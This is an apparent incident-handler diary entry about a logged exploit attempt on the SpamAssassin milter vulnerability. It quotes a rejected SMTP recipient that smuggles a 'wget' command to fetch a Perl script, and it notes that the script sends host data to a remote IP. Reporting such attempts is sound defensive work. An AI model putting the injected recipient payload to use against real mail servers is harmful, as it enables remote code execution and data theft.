Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this: Messages rejected to recipient: root+:|wget perl p.txt: smtp.target.com : User unknown in local recipient from=blue@attacker.com to=root+:|wget hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s) Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html). The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though. Update: SecurityFocus BID 38578 Mitigation: There is ...